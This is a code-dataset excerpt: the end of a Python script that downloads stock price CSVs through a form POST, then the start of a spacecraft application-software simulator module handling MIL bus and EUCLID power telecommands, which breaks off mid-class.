    hidden_elems = html.findAll(attrs={'type':'hidden'})
    form_data = {}
    for el in hidden_elems:
        m = el.attrs
        if 'value' in m:
            form_data[m['name']] = m['value']
    # Remaining form fields the download postback expects. NOTE(review):
    # the company name/search fields are hard-coded to 'SUBEX' regardless
    # of script_code -- presumably only the hidden code fields matter to
    # the server; confirm for other scrips.
    other_data = {
        'WINDOW_NAMER': '1',
        'myDestination': '#',
        'ctl00$ContentPlaceHolder1$txtFromDate': sdate,
        'ctl00$ContentPlaceHolder1$txtToDate': edate,
        'ctl00$ContentPlaceHolder1$search': 'rad_no1',
        'ctl00$ContentPlaceHolder1$hidYear': '',
        'ctl00$ContentPlaceHolder1$hidToDate' : edate,
        'ctl00$ContentPlaceHolder1$hidOldDMY' : '',
        'ctl00$ContentPlaceHolder1$hidFromDate' : sdate,
        'ctl00$ContentPlaceHolder1$hidDMY' : 'D',
        'ctl00$ContentPlaceHolder1$hiddenScripCode' : script_code,
        'ctl00$ContentPlaceHolder1$Hidden2' : '',
        'ctl00$ContentPlaceHolder1$Hidden1' : '',
        'ctl00$ContentPlaceHolder1$hidCurrentDate' : edate,
        'ctl00$ContentPlaceHolder1$hidCompanyVal' : 'SUBEX',
        'ctl00$ContentPlaceHolder1$hdnCode' : script_code,
        'ctl00$ContentPlaceHolder1$hdflag' : '0',
        'ctl00$ContentPlaceHolder1$GetQuote1_smartSearch2' : 'Enter Script Name',
        'ctl00$ContentPlaceHolder1$GetQuote1_smartSearch' : 'SUBEX LTD',
        'ctl00$ContentPlaceHolder1$DMY' : 'rdbDaily',
        'ctl00$ContentPlaceHolder1$DDate' : '',
    }
    # Coordinates of the "Download" image-button click.
    dl2_map = {'ctl00$ContentPlaceHolder1$btnDownload.x': '9',
                'ctl00$ContentPlaceHolder1$btnDownload.y' : '5',
            }
    form_data.update(other_data)
    form_data.update(dl2_map)
    module_logger.info("POST: %s", url)
    module_logger.debug("POST Data: %s", form_data)
    y = requests.post(url, data=form_data, stream=True)
    if y.ok:
        # File name: <fromdate>_<todate>_<scripcode>.csv (dd/mm/yyyy with
        # separators stripped).
        start_end = "_".join([sdate.replace("/", ""),
                              edate.replace("/", ""),
                              ""])
        fname = start_end + script_code + '.csv'
        with open(fname, 'wb') as handle:
            for block in y.iter_content(1024):
                if not block:
                    break
                handle.write(block)
    else:
        module_logger.error("Error(POST): %s", y.text)
if __name__ == '__main__':
    # Fix: get_data_for_security() returns None (it writes a CSV as a
    # side effect), so the former print() only ever showed "None".
    get_data_for_security('500002', GLOBAL_START_DATE)
    #for x in bse_get_all_stocks_list(100,1):
        #get_data_for_security(x.bseid, GLOBAL_START_DATE)
| mit | 571,531,012,602,573,700 | 35.151515 | 89 | 0.590109 | false | 3.29558 | false | false | false |
Stefan-Korner/SpacePyLibrary | SPACE/ASW.py | 1 | 44245 | #******************************************************************************
# (C) 2018, Stefan Korner, Austria *
# *
# The Space Python Library is free software; you can redistribute it and/or *
# modify it under under the terms of the MIT License as published by the *
# Massachusetts Institute of Technology. *
# *
# The Space Python Library is distributed in the hope that it will be useful, *
# but WITHOUT ANY WARRANTY; without even the implied warranty of *
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the MIT License *
# for more details. *
#******************************************************************************
# Spacecraft Application Software *
#******************************************************************************
from UTIL.SYS import Error, LOG, LOG_INFO, LOG_WARNING, LOG_ERROR
import PUS.PACKET, PUS.SERVICES
import SPACE.IF
import SUPP.IF
import UTIL.DU, UTIL.SYS
#############
# constants #
#############
# MIL Bus general
# MIL Bus Controller
# APIDs of the bus-controller TC/TM packets (PF = platform, PL = payload).
MTG_BC_PF_APID = 1920
MTG_BC_PL_APID = 1921
S4_BC_PF_APID = 1537
S4_BC_PL_APID = 1539
# Function IDs (FIDs) carried in PUS service (8,1) telecommands and
# dispatched in MILapplicationSoftwareImpl.processFunctionService().
BC_Identify_FID = 0x4E21
BC_SelfTest_FID = 0x4E22
BC_GetSelfTestReport_FID = 0x4E23
BC_Reset_FID = 0x4E24
BC_Configure_FID = 0x4E25
BC_ConfigureFrame_FID = 0x4E26
BC_AddInterrogation_FID = 0x4E27
BC_Discover_FID = 0x4E28
E5013_SETUP_DIST_DATABLOCK_FID = 0x4E2D
BC_Start_FID = 0x4E2E
BC_Stop_FID = 0x4E2F
BC_ForceFrameSwitch_FID = 0x4E29
BC_Send_FID = 0x4E30
BC_SetData_FID = 0x4E31
BC_ForceBusSwitch_FID = 0x4E32
BC_InjectError_FID = 0x4E33
BC_ClearError_FID = 0x4E34
E5013_BC_ACTIVATE_FID = 0x4E35
E5013_BC_DEACTIVATE_FID = 0x4E36
E5013_DTD_FID = 0x4E39
# MIL Bus Remote Terminal
MTG_RT_PF_APID = 1922
MTG_RT_PL_APID = 1923
S4_RT_PF_APID = 1538
S4_RT_PL_APID = 1540
RT_Identify_FID = 0x4E3E
RT_SelfTest_FID = 0x4E3F
RT_GetSelfTestReport_FID = 0x4E40
RT_Configure_FID = 0x4E41
RT_AddResponse_FID = 0x4E42
RT_Reset_FID = 0x4E43
RT_SAEnable_FID = 0x4E44
E5013_SETUP_ACQU_DATABLOCK_FID = 0x4E2A
RT_Start_FID = 0x4E45
RT_Stop_FID = 0x4E46
RT_InjectError_FID = 0x4E47
RT_ClearError_FID = 0x4E48
E5013_RT_ACTIVATE_FID = 0x4E49
E5013_RT_DEACTIVATE_FID = 0x4E4A
E5013_ATR_FID = 0x4E4B
# EUCLID Power SCOEs
# Command codes for the battery simulator (BS), fire-the-harness (FTH),
# laboratory power supply (LPS) and solar-array simulator (SAS) SCOEs.
BS_Initialize = 0x0302
BS_SetLocal = 0x0314
BS_SetRemote = 0x0315
BS_LockInstruments = 0x0312
BS_UnlockInstruments = 0x0313
BS_SetOnline = 0x0307
BS_SetOffline = 0x0306
BS_SelfTest = 0x0311
FTH_Initialize = 0x0403
FTH_EnableGUI = 0x0435
FTH_DisableGUI = 0x0436
FTH_SetOnline = 0x0405
FTH_SetOffline = 0x0406
FTH_SelfTest = 0x0410
FTH_ConfigNEA = 0x0411
# Byte layout of the FTH_ConfigNEA command parameters.
FTH_ConfigNEA_NEA_ID_BYTE_OFFSET = 14
FTH_ConfigNEA_NEA_ID_BYTE_SIZE = 64
FTH_ConfigNEA_A_LO_BYTE_OFFSET = 78
FTH_ConfigNEA_A_LO_BYTE_SIZE = 4
FTH_ConfigNEA_A_HI_min_BYTE_OFFSET = 82
FTH_ConfigNEA_A_HI_min_BYTE_SIZE = 4
FTH_ConfigNEA_A_HI_max_BYTE_OFFSET = 86
FTH_ConfigNEA_A_HI_max_BYTE_SIZE = 4
FTH_ConfigNEA_Tmin_BYTE_OFFSET = 90
FTH_ConfigNEA_Tmin_BYTE_SIZE = 1
FTH_ConfigNEA_Tmax_BYTE_OFFSET = 91
FTH_ConfigNEA_Tmax_BYTE_SIZE = 1
FTH_ConfigNEA_NEA_TYPE_BYTE_OFFSET = 92
FTH_ConfigNEA_NEA_TYPE_BYTE_SIZE = 64
FTH_SelectNEA = 0x0434
# Byte layout of the FTH_SelectNEA command parameters.
FTH_SelectNEA_NEA_ID_BYTE_OFFSET = 14
FTH_SelectNEA_NEA_ID_BYTE_SIZE = 64
FTH_SelectNEA_NEA_TYPE_BYTE_OFFSET = 78
FTH_SelectNEA_NEA_TYPE_BYTE_SIZE = 64
FTH_SelectNEA_select_BYTE_OFFSET = 142
FTH_SelectNEA_select_BYTE_SIZE = 1
FTH_NEA_Mask_BYTE_SIZE = 128
FTH_NEA_Pulse_BYTE_SIZE = 128
LPS_Initialize = 0x0022
LPS_SetLocal = 0x0041
LPS_SetRemote = 0x0042
LPS_LockInstruments = 0x0039
LPS_UnlockInstruments = 0x0040
LPS_SetOnLine = 0x0016
LPS_SetOffLine = 0x0017
LPS_SelfTest = 0x0035
SAS_Initialize = 0x0210
SAS_SetLocal = 0x0233
SAS_SetRemote = 0x0234
SAS_LockInstruments = 0x0229
SAS_UnlockInstruments = 0x0230
SAS_SetOnline = 0x0206
SAS_SetOffline = 0x0208
SAS_SelfTest = 0x0225
# Commanding Mode
EPWR_CMD_LOCAL = "0"
EPWR_CMD_REMOTE = "1"
# Operation Mode
EPWR_OP_OFFLINE = "0"
EPWR_OP_OFFLINE2 = "4"
EPWR_OP_ONLINE = "8"
EPWR_OP_ONLINE2 = "15"
EPWR_OP_FTH_ONLINE = "1"
# TM parameter (mnemonic) names reporting the operation mode per SCOE.
EPWR_BS_OP = "CHSTAT1"
EPWR_FTH_OP = "ONOFF"
EPWR_LPS_OP_Section1P = "CHSTAT1"
EPWR_LPS_OP_Section1S = "CHSTAT2"
EPWR_LPS_OP_Section2P = "CHSTAT3"
EPWR_LPS_OP_Section2S = "CHSTAT4"
EPWR_LPS_OP_Section3P = "CHSTAT5"
EPWR_LPS_OP_Section3S = "CHSTAT6"
EPWR_SAS_OP_Section1 = "CHSTATSA1"
EPWR_SAS_OP_Section2 = "CHSTATSA2"
EPWR_SAS_OP_Section3 = "CHSTATSA3"
EPWR_SAS_OP_Section4 = "CHSTATSA4"
EPWR_SAS_OP_Section5 = "CHSTATSA5"
EPWR_SAS_OP_Section6 = "CHSTATSA6"
EPWR_SAS_OP_Section7 = "CHSTATSA7"
EPWR_SAS_OP_Section8 = "CHSTATSA8"
EPWR_SAS_OP_Section9 = "CHSTATSA9"
EPWR_SAS_OP_Section10 = "CHSTATSA10"
EPWR_SAS_OP_Section11 = "CHSTATSA11"
EPWR_SAS_OP_Section12 = "CHSTATSA12"
EPWR_SAS_OP_Section13 = "CHSTATSA13"
EPWR_SAS_OP_Section14 = "CHSTATSA14"
EPWR_SAS_OP_Section15 = "CHSTATSA15"
# SCOE Running
EPWR_SRUN_LPSN = "0,1"
EPWR_SRUN_LPSR = "1,1"
EPWR_SRUN_SAS = "0,0"
EPWR_SRUN_PARAMS = "ONOFF11,ONOFF12"
###########
# classes #
###########
# =============================================================================
class ApplicationSoftwareImpl(SPACE.IF.ApplicationSoftware):
  """Implementation of the spacecraft's application software"""
  # ---------------------------------------------------------------------------
  def __init__(self):
    """Initialise attributes only"""
    config = UTIL.SYS.s_configuration
    self.tcFunctionIdBytePos = int(config.TC_FKT_ID_BYTE_OFFSET)
    self.tcFunctionIdByteSize = int(config.TC_FKT_ID_BYTE_SIZE)
    self.connectionTestReportMnemo = config.TM_TEST_MNEMO
  # ---------------------------------------------------------------------------
  # can be overloaded in derived classes
  def processFunctionService(self, apid, tcFunctionId, tcPacketDu):
    """default processing of PUS Service (8,1) telecommand packet"""
    return self.processDefault(apid, tcPacketDu)
  # ---------------------------------------------------------------------------
  # can be overloaded in derived classes
  def processTestService(self, apid, tcPacketDu):
    """default processing of the PUS Service (17,1) telecommand packet"""
    LOG("ASW: Connection Test", "SPACE")
    # answer the connection test with the configured report packet
    return SPACE.IF.s_onboardComputer.generateEmptyTMpacket(
      self.connectionTestReportMnemo)
  # ---------------------------------------------------------------------------
  # can be overloaded in derived classes
  def processDefault(self, apid, tcPacketDu):
    """default implementation of TC processing"""
    LOG("ASW: Standard Telecommand", "SPACE")
    return True
  # ---------------------------------------------------------------------------
  def processTCpacket(self, tcPacketDu):
    """
    processes a telecommand packet from the CCS
    implementation of SPACE.IF.ApplicationSoftware.processTCpacket
    """
    apid = tcPacketDu.applicationProcessId
    LOG_INFO("ApplicationSoftwareImpl.processTCpacket(" + str(apid) + ")", "SPACE")
    # non-PUS packets go straight to the default handler
    if not PUS.PACKET.isPUSpacketDU(tcPacketDu):
      return self.processDefault(apid, tcPacketDu)
    serviceType = tcPacketDu.serviceType
    serviceSubType = tcPacketDu.serviceSubType
    if serviceType == PUS.SERVICES.TC_FKT_TYPE and \
       serviceSubType == PUS.SERVICES.TC_FKT_PERFORM_FUNCTION:
      # PUS Function Management command: extract the function ID
      tcFunctionId = tcPacketDu.getUnsigned(
        self.tcFunctionIdBytePos, self.tcFunctionIdByteSize)
      LOG("tcFunctionId = " + str(tcFunctionId), "SPACE")
      return self.processFunctionService(apid, tcFunctionId, tcPacketDu)
    if serviceType == PUS.SERVICES.TC_TEST_TYPE and \
       serviceSubType == PUS.SERVICES.TC_TEST_SUBTYPE:
      # PUS Test command (connection test)
      return self.processTestService(apid, tcPacketDu)
    # other telecommand
    return self.processDefault(apid, tcPacketDu)
# =============================================================================
class MILapplicationSoftwareImpl(ApplicationSoftwareImpl):
  """Specialization of the spacecraft's application software"""
  # ---------------------------------------------------------------------------
  def __init__(self):
    """Initialise attributes only"""
    ApplicationSoftwareImpl.__init__(self)
  # ---------------------------------------------------------------------------
  # shall be overloaded in derived classes
  # Hooks that mission-specific subclasses implement to emit TM reports
  # for the bus controller (BC) and remote terminal (RT) responses.
  def sendBC_Identity(self, bus):
    pass
  def sendBC_SelfTestResponse(self, bus, errorId):
    pass
  def sendBC_SelfTestReport(self, bus):
    pass
  def sendBC_ResetResponse(self, bus):
    pass
  def sendRT_Identity(self, bus):
    pass
  def sendRT_SelfTestResponse(self, bus, errorId):
    pass
  def sendRT_SelfTestReport(self, bus):
    pass
  def sendRT_ResetResponse(self, bus):
    pass
  # ---------------------------------------------------------------------------
  def processFunctionService(self, apid, tcFunctionId, tcPacketDu):
    """
    processes PUS Service (8,1) telecommand packet
    implementation of ApplicationSoftwareImpl.processFunctionService

    The APID selects the addressed device (BC or RT) and the bus
    (platform or payload); the function ID selects the operation.
    """
    forwardToBc = False
    forwardToRt = False
    if apid == self.getBcPfAPID():
      forwardToBc = True
      bus = SPACE.IF.MIL_BUS_PF
    elif apid == self.getBcPlAPID():
      forwardToBc = True
      bus = SPACE.IF.MIL_BUS_PL
    elif apid == self.getRtPfAPID():
      forwardToRt = True
      bus = SPACE.IF.MIL_BUS_PF
    elif apid == self.getRtPlAPID():
      forwardToRt = True
      bus = SPACE.IF.MIL_BUS_PL
    else:
      # unexpected APID
      LOG_ERROR("ASW: unexpected APID: " + str(apid), "SPACE")
      return False
    # --- bus controller commands ---
    if forwardToBc and SPACE.IF.s_milBusController != None:
      if tcFunctionId == BC_Identify_FID:
        if SPACE.IF.s_milBusController.identify(bus):
          return self.sendBC_Identity(bus)
        LOG_ERROR("ASW: BC_Identify failed", "SPACE")
        return False
      elif tcFunctionId == BC_SelfTest_FID:
        # errorId 0 = self test passed, 1 = failed
        errorId = 1
        if SPACE.IF.s_milBusController.selfTest(bus):
          errorId = 0
        return self.sendBC_SelfTestResponse(bus, errorId)
      elif tcFunctionId == BC_GetSelfTestReport_FID:
        if SPACE.IF.s_milBusController.getSelfTestReport(bus):
          return self.sendBC_SelfTestReport(bus)
        LOG_ERROR("ASW: BC_GetSelfTestReport failed", "SPACE")
        return False
      elif tcFunctionId == BC_Reset_FID:
        if SPACE.IF.s_milBusController.reset(bus):
          return self.sendBC_ResetResponse(bus)
        LOG_ERROR("ASW: BC_Reset failed", "SPACE")
        return False
      elif tcFunctionId == BC_Configure_FID:
        return SPACE.IF.s_milBusController.configure(bus)
      elif tcFunctionId == BC_ConfigureFrame_FID:
        return SPACE.IF.s_milBusController.configureFrame(bus)
      elif tcFunctionId == BC_AddInterrogation_FID:
        return SPACE.IF.s_milBusController.addInterrogation(bus)
      elif tcFunctionId == BC_Discover_FID:
        return SPACE.IF.s_milBusController.discover(bus)
      elif tcFunctionId == E5013_SETUP_DIST_DATABLOCK_FID:
        return SPACE.IF.s_milBusController.setupDistDatablock(bus)
      elif tcFunctionId == BC_Start_FID:
        return SPACE.IF.s_milBusController.start(bus)
      elif tcFunctionId == BC_Stop_FID:
        return SPACE.IF.s_milBusController.stop(bus)
      elif tcFunctionId == BC_ForceFrameSwitch_FID:
        return SPACE.IF.s_milBusController.forceFrameSwitch(bus)
      elif tcFunctionId == BC_Send_FID:
        return SPACE.IF.s_milBusController.send(bus)
      elif tcFunctionId == BC_SetData_FID:
        return SPACE.IF.s_milBusController.setData(bus)
      elif tcFunctionId == BC_ForceBusSwitch_FID:
        return SPACE.IF.s_milBusController.forceBusSwitch(bus)
      elif tcFunctionId == BC_InjectError_FID:
        return SPACE.IF.s_milBusController.injectError(bus)
      elif tcFunctionId == BC_ClearError_FID:
        return SPACE.IF.s_milBusController.clearError(bus)
      elif tcFunctionId == E5013_BC_ACTIVATE_FID:
        return SPACE.IF.s_milBusController.activate(bus)
      elif tcFunctionId == E5013_BC_DEACTIVATE_FID:
        return SPACE.IF.s_milBusController.deactivate(bus)
      elif tcFunctionId == E5013_DTD_FID:
        return SPACE.IF.s_milBusController.dtd(bus)
    # --- remote terminal commands ---
    elif forwardToRt and SPACE.IF.s_milBusRemoteTerminals != None:
      if tcFunctionId == RT_Identify_FID:
        if SPACE.IF.s_milBusRemoteTerminals.identify(bus):
          return self.sendRT_Identity(bus)
        LOG_ERROR("ASW: RT_Identify failed", "SPACE")
        return False
      elif tcFunctionId == RT_SelfTest_FID:
        # errorId 0 = self test passed, 1 = failed
        errorId = 1
        if SPACE.IF.s_milBusRemoteTerminals.selfTest(bus):
          errorId = 0
        return self.sendRT_SelfTestResponse(bus, errorId)
      elif tcFunctionId == RT_GetSelfTestReport_FID:
        if SPACE.IF.s_milBusRemoteTerminals.getSelfTestReport(bus):
          return self.sendRT_SelfTestReport(bus)
        LOG_ERROR("ASW: RT_GetSelfTestReport failed", "SPACE")
        return False
      elif tcFunctionId == RT_Configure_FID:
        return SPACE.IF.s_milBusRemoteTerminals.configure(bus)
      elif tcFunctionId == RT_AddResponse_FID:
        return SPACE.IF.s_milBusRemoteTerminals.addResponse(bus)
      elif tcFunctionId == RT_Reset_FID:
        if SPACE.IF.s_milBusRemoteTerminals.reset(bus):
          return self.sendRT_ResetResponse(bus)
        LOG_ERROR("ASW: RT_Reset failed", "SPACE")
        return False
      elif tcFunctionId == RT_SAEnable_FID:
        return SPACE.IF.s_milBusRemoteTerminals.saEnable(bus)
      elif tcFunctionId == E5013_SETUP_ACQU_DATABLOCK_FID:
        return SPACE.IF.s_milBusRemoteTerminals.setupAcquDatablock(bus)
      elif tcFunctionId == RT_Start_FID:
        return SPACE.IF.s_milBusRemoteTerminals.start(bus)
      elif tcFunctionId == RT_Stop_FID:
        return SPACE.IF.s_milBusRemoteTerminals.stop(bus)
      elif tcFunctionId == RT_InjectError_FID:
        return SPACE.IF.s_milBusRemoteTerminals.injectError(bus)
      elif tcFunctionId == RT_ClearError_FID:
        return SPACE.IF.s_milBusRemoteTerminals.clearError(bus)
      elif tcFunctionId == E5013_RT_ACTIVATE_FID:
        return SPACE.IF.s_milBusRemoteTerminals.activate(bus)
      elif tcFunctionId == E5013_RT_DEACTIVATE_FID:
        return SPACE.IF.s_milBusRemoteTerminals.deactivate(bus)
      elif tcFunctionId == E5013_ATR_FID:
        return SPACE.IF.s_milBusRemoteTerminals.atr(bus)
    # NOTE(review): reached when no device object is registered or the
    # function ID did not match any branch -- reporting success (True)
    # in those cases may hide mis-commanding; confirm this is intended.
    return True
  # ---------------------------------------------------------------------------
  def notifyMILdatablockAcquisition(self, rtAddress, dataBlock):
    """
    The BC has received on the MIL Bus a data block from a RT
    (log-only default implementation)
    """
    LOG_INFO("ApplicationSoftwareImpl.notifyMILdatablockAcquisition(" + str(rtAddress) + ")", "SPACE")
  # ---------------------------------------------------------------------------
  def notifyMILdatablockDistribution(self, rtAddress, dataBlock):
    """
    The mRT has received on the MIL Bus a data block from the BC
    (log-only default implementation)
    """
    LOG_INFO("ApplicationSoftwareImpl.notifyMILdatablockDistribution(" + str(rtAddress) + ")", "SPACE")
# =============================================================================
class MTGapplicationSoftwareImpl(MILapplicationSoftwareImpl):
  """Implementation of the MTG spacecraft's application software"""
  # ---------------------------------------------------------------------------
  def __init__(self):
    """Initialise attributes only"""
    MILapplicationSoftwareImpl.__init__(self)
  # ---------------------------------------------------------------------------
  def getBcPfAPID(self):
    """implementation of SPACE.IF.ApplicationSoftware.getBcPfAPID"""
    return MTG_BC_PF_APID
  # ---------------------------------------------------------------------------
  def getBcPlAPID(self):
    """implementation of SPACE.IF.ApplicationSoftware.getBcPlAPID"""
    return MTG_BC_PL_APID
  # ---------------------------------------------------------------------------
  def getRtPfAPID(self):
    """implementation of SPACE.IF.ApplicationSoftware.getRtPfAPID"""
    return MTG_RT_PF_APID
  # ---------------------------------------------------------------------------
  def getRtPlAPID(self):
    """implementation of SPACE.IF.ApplicationSoftware.getRtPlAPID"""
    return MTG_RT_PL_APID
  # ---------------------------------------------------------------------------
  def _sendSelfTestResponse(self, pktMnemonic, parErrorId, errorId):
    """builds and sends a self test response TM packet with an error ID"""
    tmPacketData = SUPP.IF.s_definitions.getTMpacketInjectData(pktMnemonic,
                                                              parErrorId,
                                                              str(errorId))
    # check the TM packet data
    if tmPacketData == None:
      LOG_ERROR("TM packet creation failed for " + pktMnemonic, "SPACE")
      return False
    # send the TM packet
    return SPACE.IF.s_onboardComputer.generateTMpacket(tmPacketData)
  # ---------------------------------------------------------------------------
  def sendBC_Identity(self, bus):
    """implementation of ApplicationSoftwareImpl.sendBC_Identity"""
    # PF and PL bus report their identity in different TM packets
    pktMnemonic = "YD2TMPK00001" if bus == SPACE.IF.MIL_BUS_PF else "YD2TMPK00501"
    return SPACE.IF.s_onboardComputer.generateEmptyTMpacket(pktMnemonic)
  # ---------------------------------------------------------------------------
  def sendBC_SelfTestResponse(self, bus, errorId):
    """implementation of ApplicationSoftwareImpl.sendBC_SelfTestResponse"""
    if bus == SPACE.IF.MIL_BUS_PF:
      pktMnemonic, parErrorId = "YD2TMPK00002", "ZD2M182X"
    else:
      pktMnemonic, parErrorId = "YD2TMPK00502", "ZD2M682X"
    return self._sendSelfTestResponse(pktMnemonic, parErrorId, errorId)
  # ---------------------------------------------------------------------------
  def sendBC_SelfTestReport(self, bus):
    """implementation of ApplicationSoftwareImpl.sendBC_SelfTestReport"""
    pktMnemonic = "YD2TMPK00003" if bus == SPACE.IF.MIL_BUS_PF else "YD2TMPK00503"
    return SPACE.IF.s_onboardComputer.generateEmptyTMpacket(pktMnemonic)
  # ---------------------------------------------------------------------------
  def sendBC_ResetResponse(self, bus):
    """implementation of ApplicationSoftwareImpl.sendBC_ResetResponse"""
    pktMnemonic = "YD2TMPK00004" if bus == SPACE.IF.MIL_BUS_PF else "YD2TMPK00504"
    return SPACE.IF.s_onboardComputer.generateEmptyTMpacket(pktMnemonic)
  # ---------------------------------------------------------------------------
  def sendRT_Identity(self, bus):
    """implementation of ApplicationSoftwareImpl.sendRT_Identity"""
    pktMnemonic = "YD2TMPK00030" if bus == SPACE.IF.MIL_BUS_PF else "YD2TMPK00530"
    return SPACE.IF.s_onboardComputer.generateEmptyTMpacket(pktMnemonic)
  # ---------------------------------------------------------------------------
  def sendRT_SelfTestResponse(self, bus, errorId):
    """implementation of ApplicationSoftwareImpl.sendRT_SelfTestResponse"""
    if bus == SPACE.IF.MIL_BUS_PF:
      pktMnemonic, parErrorId = "YD2TMPK00031", "ZD2M198X"
    else:
      pktMnemonic, parErrorId = "YD2TMPK00531", "ZD2M698X"
    return self._sendSelfTestResponse(pktMnemonic, parErrorId, errorId)
  # ---------------------------------------------------------------------------
  def sendRT_SelfTestReport(self, bus):
    """implementation of ApplicationSoftwareImpl.sendRT_SelfTestReport"""
    pktMnemonic = "YD2TMPK00032" if bus == SPACE.IF.MIL_BUS_PF else "YD2TMPK00532"
    return SPACE.IF.s_onboardComputer.generateEmptyTMpacket(pktMnemonic)
  # ---------------------------------------------------------------------------
  def sendRT_ResetResponse(self, bus):
    """implementation of ApplicationSoftwareImpl.sendRT_ResetResponse"""
    pktMnemonic = "YD2TMPK00035" if bus == SPACE.IF.MIL_BUS_PF else "YD2TMPK00535"
    return SPACE.IF.s_onboardComputer.generateEmptyTMpacket(pktMnemonic)
# =============================================================================
class S4applicationSoftwareImpl(MILapplicationSoftwareImpl):
  """Implementation of the Sentinel 4 spacecraft's application software"""
  # ---------------------------------------------------------------------------
  def __init__(self):
    """Initialise attributes only"""
    MILapplicationSoftwareImpl.__init__(self)
  # ---------------------------------------------------------------------------
  def getBcPfAPID(self):
    """implementation of SPACE.IF.ApplicationSoftware.getBcPfAPID"""
    return S4_BC_PF_APID
  # ---------------------------------------------------------------------------
  def getBcPlAPID(self):
    """implementation of SPACE.IF.ApplicationSoftware.getBcPlAPID"""
    return S4_BC_PL_APID
  # ---------------------------------------------------------------------------
  def getRtPfAPID(self):
    """implementation of SPACE.IF.ApplicationSoftware.getRtPfAPID"""
    return S4_RT_PF_APID
  # ---------------------------------------------------------------------------
  def getRtPlAPID(self):
    """implementation of SPACE.IF.ApplicationSoftware.getRtPlAPID"""
    return S4_RT_PL_APID
  # ---------------------------------------------------------------------------
  def _sendSelfTestResponse(self, pktMnemonic, parErrorId, errorId):
    """builds and sends a self test response TM packet with an error ID"""
    tmPacketData = SUPP.IF.s_definitions.getTMpacketInjectData(pktMnemonic,
                                                              parErrorId,
                                                              str(errorId))
    # check the TM packet data
    if tmPacketData == None:
      LOG_ERROR("TM packet creation failed for " + pktMnemonic, "SPACE")
      return False
    # send the TM packet
    return SPACE.IF.s_onboardComputer.generateTMpacket(tmPacketData)
  # ---------------------------------------------------------------------------
  def sendBC_Identity(self, bus):
    """implementation of ApplicationSoftwareImpl.sendBC_Identity"""
    # PF and PL bus report their identity in different TM packets
    pktMnemonic = "XPSTMPK10101" if bus == SPACE.IF.MIL_BUS_PF else "XPSTMPK10601"
    return SPACE.IF.s_onboardComputer.generateEmptyTMpacket(pktMnemonic)
  # ---------------------------------------------------------------------------
  def sendBC_SelfTestResponse(self, bus, errorId):
    """implementation of ApplicationSoftwareImpl.sendBC_SelfTestResponse"""
    if bus == SPACE.IF.MIL_BUS_PF:
      pktMnemonic, parErrorId = "XPSTMPK10102", "XPSM100X"
    else:
      pktMnemonic, parErrorId = "XPSTMPK10602", "XPSM600X"
    return self._sendSelfTestResponse(pktMnemonic, parErrorId, errorId)
  # ---------------------------------------------------------------------------
  def sendBC_SelfTestReport(self, bus):
    """implementation of ApplicationSoftwareImpl.sendBC_SelfTestReport"""
    pktMnemonic = "XPSTMPK10103" if bus == SPACE.IF.MIL_BUS_PF else "XPSTMPK10603"
    return SPACE.IF.s_onboardComputer.generateEmptyTMpacket(pktMnemonic)
  # ---------------------------------------------------------------------------
  def sendBC_ResetResponse(self, bus):
    """implementation of ApplicationSoftwareImpl.sendBC_ResetResponse"""
    pktMnemonic = "XPSTMPK10104" if bus == SPACE.IF.MIL_BUS_PF else "XPSTMPK10604"
    return SPACE.IF.s_onboardComputer.generateEmptyTMpacket(pktMnemonic)
  # ---------------------------------------------------------------------------
  def sendRT_Identity(self, bus):
    """implementation of ApplicationSoftwareImpl.sendRT_Identity"""
    pktMnemonic = "XPSTMPK10130" if bus == SPACE.IF.MIL_BUS_PF else "XPSTMPK10630"
    return SPACE.IF.s_onboardComputer.generateEmptyTMpacket(pktMnemonic)
  # ---------------------------------------------------------------------------
  def sendRT_SelfTestResponse(self, bus, errorId):
    """implementation of ApplicationSoftwareImpl.sendRT_SelfTestResponse"""
    if bus == SPACE.IF.MIL_BUS_PF:
      pktMnemonic, parErrorId = "XPSTMPK10131", "XPSM184X"
    else:
      pktMnemonic, parErrorId = "XPSTMPK10631", "XPSM684X"
    return self._sendSelfTestResponse(pktMnemonic, parErrorId, errorId)
  # ---------------------------------------------------------------------------
  def sendRT_SelfTestReport(self, bus):
    """implementation of ApplicationSoftwareImpl.sendRT_SelfTestReport"""
    pktMnemonic = "XPSTMPK10132" if bus == SPACE.IF.MIL_BUS_PF else "XPSTMPK10632"
    return SPACE.IF.s_onboardComputer.generateEmptyTMpacket(pktMnemonic)
  # ---------------------------------------------------------------------------
  def sendRT_ResetResponse(self, bus):
    """implementation of ApplicationSoftwareImpl.sendRT_ResetResponse"""
    pktMnemonic = "XPSTMPK10135" if bus == SPACE.IF.MIL_BUS_PF else "XPSTMPK10635"
    return SPACE.IF.s_onboardComputer.generateEmptyTMpacket(pktMnemonic)
# =============================================================================
class EUCLIDpowerFEEsim_BS(ApplicationSoftwareImpl):
  """Implementation of the EUCLID BS Power Frontend Simulation"""
  # ---------------------------------------------------------------------------
  def __init__(self):
    """Initialise attributes only"""
    ApplicationSoftwareImpl.__init__(self)
    # SCOE state: commanding mode (LOCAL/REMOTE) and operation mode
    self.commandingMode = EPWR_CMD_LOCAL
    self.operationMode = EPWR_OP_OFFLINE
  # ---------------------------------------------------------------------------
  def processFunctionService(self, apid, tcFunctionId, tcPacketDu):
    """
    processes PUS Service (8,1) telecommand packet
    implementation of ApplicationSoftwareImpl.processFunctionService
    returns False when the command fails, True otherwise
    """
    if tcFunctionId == BS_Initialize:
      LOG_INFO("*** BS_Initialize ***", "SPACE")
      LOG("push HKTM", "SPACE")
      return self.sendBS_Monitor()
    elif tcFunctionId == BS_SetLocal:
      LOG_INFO("*** BS_SetLocal ***", "SPACE")
      LOG("set the SCOE into the LOCAL commanding mode", "SPACE")
      self.commandingMode = EPWR_CMD_LOCAL
    elif tcFunctionId == BS_SetRemote:
      LOG_INFO("*** BS_SetRemote ***", "SPACE")
      LOG("set the SCOE into the REMOTE commanding mode", "SPACE")
      self.commandingMode = EPWR_CMD_REMOTE
    elif tcFunctionId == BS_LockInstruments:
      LOG_INFO("*** BS_LockInstruments ***", "SPACE")
      LOG("not used for simulation", "SPACE")
    elif tcFunctionId == BS_UnlockInstruments:
      LOG_INFO("*** BS_UnlockInstruments ***", "SPACE")
      LOG("not used for simulation", "SPACE")
    elif tcFunctionId == BS_SetOnline:
      LOG_INFO("*** BS_SetOnline ***", "SPACE")
      LOG("set the SCOE into the ONLINE operation mode", "SPACE")
      self.operationMode = EPWR_OP_ONLINE
      return self.sendBS_Monitor()
    elif tcFunctionId == BS_SetOffline:
      LOG_INFO("*** BS_SetOffline ***", "SPACE")
